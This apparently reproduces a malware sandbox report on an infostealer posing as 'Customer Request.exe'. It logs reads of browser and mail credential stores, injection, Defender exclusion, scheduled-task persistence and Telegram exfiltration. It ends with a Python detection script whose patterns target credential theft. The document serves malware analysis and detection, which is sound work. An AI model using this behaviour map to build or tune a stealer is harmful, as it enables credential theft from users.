                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Users\user\AppData\Roaming\gCFuOglEso.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Users\user\AppData\Roaming\gCFuOglEso.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Customer Request.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2704835617.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2745993906.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2717613443.000000000449A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2741223606.00000000062EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2710969497.000000000312F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2746777636.0000000007445000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2741223606.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2717700479.000000000411B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2741655848.0000000006798000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2717700479.0000000004540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2717613443.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR

Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Customer Request.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Customer Request.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2710539876.0000000002ABB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2710969497.000000000312F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File sources: the same two Yara match sets already listed under Stealing of Sensitive Information above (sslproxydump.pcap, the eight unpacked PE regions, the 28 memory dumps and the four process memory spaces; then the single 0000000F.00000002.2710539876.0000000002CBF000 dump with the Customer Request.exe PID 5932 and gCFuOglEso.exe PID 7388 process memory spaces). The lists are identical and are not repeated here.
ATT&CK matrix (the original 14-column grid, rebuilt as one line per tactic; bracketed digits are the signature-count badges exactly as they appeared next to a technique in the original, unbadged techniques are the matrix template and were not observed):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scheduled Task/Job [1]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Scheduled Task/Job [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading [1]; Process Injection [112]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [1]; Timestomp [1]; DLL Side-Loading [1]; Masquerading [11]; Virtualization/Sandbox Evasion [31]; Process Injection [112]
Credential Access: OS Credential Dumping [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery [1]; System Information Discovery [13]; Query Registry [1]; Security Software Discovery [11]; Process Discovery [2]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; System Network Configuration Discovery [1]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [11]; Data from Local System [1]; Email Collection [1]; Clipboard Data [1]; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Web Service [1]; Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1619174 | Sample: Customer Request.exe | Start date: 19/02/2025 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures.
Contacted hosts: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 2 other IPs or domains.

Process tree (the bracketed numbers are the created-file / created-registry-value counters shown on the original graph's process nodes):

Customer Request.exe [7]
  dropped: C:\Users\user\AppData\...\gCFuOglEso.exe (PE32); C:\Users\...\gCFuOglEso.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpBA61.tmp (XML); C:\Users\user\...\Customer Request.exe.log (ASCII)
  signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  +- Customer Request.exe [15 74]
  |    network: checkip.dyndns.com 132.226.8.169 (49712, 49717, 49718; UTMEMUS, United States); api.telegram.org 149.154.167.220 (443, 49743, 49747; TELEGRAMRU, United Kingdom); reallyfreegeoip.org 104.21.112.1 (443, 49713, 49715; CLOUDFLARENETUS, United States)
  |    signatures: Moves itself to temp directory
  +- powershell.exe [23]
  |    signatures: Loading BitLocker PowerShell Module
  |    +- conhost.exe
  |    +- WmiPrvSE.exe
  +- powershell.exe [23]
  |    +- conhost.exe
  +- 2 other processes
       +- conhost.exe

gCFuOglEso.exe
  signatures: Multi AV Scanner detection for dropped file
  +- gCFuOglEso.exe
  |    dropped: C:\Users\user\AppData\...\tmpG548.tmp (copy) (PE32)
  |    signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
  +- schtasks.exe
       +- conhost.exe
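The credential-store accesses listed under Stealing of Sensitive Information (the Chrome and Edge Login Data files, the Postbox profile directory, the Outlook MAPI profile key) and the hosts in the behavior graph (checkip.dyndns.com, reallyfreegeoip.org, api.telegram.org) are the two observable halves of this sample's stealer loop: read the stores, learn the victim's public IP and country, ship the result through the Telegram Bot API. The script below is an added example, not code from the report or from Joe Sandbox. It parses event lines written in the report's own flattened "Source: <process><event>: <target>" form, labels credential-store reads by any process outside an assumed allow-list and any contact with the geo-IP or Telegram hosts, and flags a process that shows both. The sample events, the allow-list and the label names are constructed for the example.

```python
"""Triage of host and network events of the kind this report records.

Added example, not code from the report or from Joe Sandbox. The event lines
below are constructed to mirror the report's observations (browser 'Login Data'
files, the Postbox profile directory, the Outlook MAPI profile key, and the
geo-IP / Telegram hosts from the behavior graph); the allow-list of legitimate
readers is an assumption to tune per environment.
"""
import re
from collections import defaultdict

# Credential stores the report shows the sample opening.
BROWSER_LOGIN_DB = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Login Data$", re.I)
MAIL_PROFILE_FILE = re.compile(r"\\PostboxApp\\Profiles\\?$", re.I)
MAIL_PROFILE_KEY = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\", re.I)

# Hosts from the behavior graph: public-IP / geo lookups and the Telegram Bot API.
GEOIP_HOSTS = {"checkip.dyndns.com", "reallyfreegeoip.org"}
EXFIL_HOSTS = {"api.telegram.org"}

# Assumed allow-list: processes expected to read these stores themselves.
ALLOWED_READERS = {"chrome.exe", "msedge.exe", "outlook.exe", "postbox.exe"}

# The report glues the process path and the event kind together with no
# separator, so the process is everything up to the first '.exe'.
EVENT_RE = re.compile(
    r"^Source: (?P<proc>.+?\.exe)"
    r"(?P<kind>File opened|Key opened|DNS query|Network connection): (?P<target>.+?)\s*$")


def parse_event(line):
    """Return (process_name, kind, target) or None for non-event lines."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    proc = m.group("proc").rsplit("\\", 1)[-1].lower()
    target = re.sub(r"\s*Jump to behavior$", "", m.group("target"))  # page residue
    return proc, m.group("kind"), target


def classify(proc, kind, target):
    """Map one event to a finding label, or None when it is uninteresting."""
    if kind == "File opened":
        if BROWSER_LOGIN_DB.search(target):
            return None if proc in ALLOWED_READERS else "browser_login_db_read"
        if MAIL_PROFILE_FILE.search(target):
            return None if proc in ALLOWED_READERS else "mail_profile_read"
    elif kind == "Key opened":
        if MAIL_PROFILE_KEY.search(target):
            return None if proc in ALLOWED_READERS else "mail_profile_read"
    elif kind in ("DNS query", "Network connection"):
        host = target.split()[0].lower()  # host may be followed by ip:port
        if host in GEOIP_HOSTS:
            return "public_ip_lookup"
        if host in EXFIL_HOSTS:
            return "telegram_bot_api"
    return None


def triage(lines):
    """Aggregate findings per process. A process is flagged when it both reads
    a credential store and reaches a geo-IP or Telegram endpoint."""
    findings = defaultdict(set)
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        label = classify(*event)
        if label:
            findings[event[0]].add(label)
    report = {}
    for proc, labels in findings.items():
        steals = bool(labels & {"browser_login_db_read", "mail_profile_read"})
        beacons = bool(labels & {"public_ip_lookup", "telegram_bot_api"})
        report[proc] = {"findings": sorted(labels), "flag": steals and beacons}
    return report


# Constructed sample, modelled on the report's lines; not a verbatim log.
SAMPLE_EVENTS = [
    r"Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"Source: C:\Users\user\Desktop\Customer Request.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior",
    r"Source: C:\Users\user\Desktop\Customer Request.exeDNS query: checkip.dyndns.com",
    r"Source: C:\Users\user\Desktop\Customer Request.exeNetwork connection: api.telegram.org 149.154.167.220:443",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\System32\svchost.exeDNS query: www.microsoft.com",
]

if __name__ == "__main__":
    for proc, result in triage(SAMPLE_EVENTS).items():
        print(proc, result)
```

Note the correlation gap that the report itself shows: the browser and mail stores are read mostly by the injected gCFuOglEso.exe copy, while the geo-IP and Telegram traffic comes from the re-launched Customer Request.exe child. A per-process rule as written therefore flags only the process that did both; in a real pipeline the findings should be joined across the process tree (parent, injected child and dropped copy) before a verdict is made, and the allow-list should be replaced with signed-image or path checks rather than bare file names.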
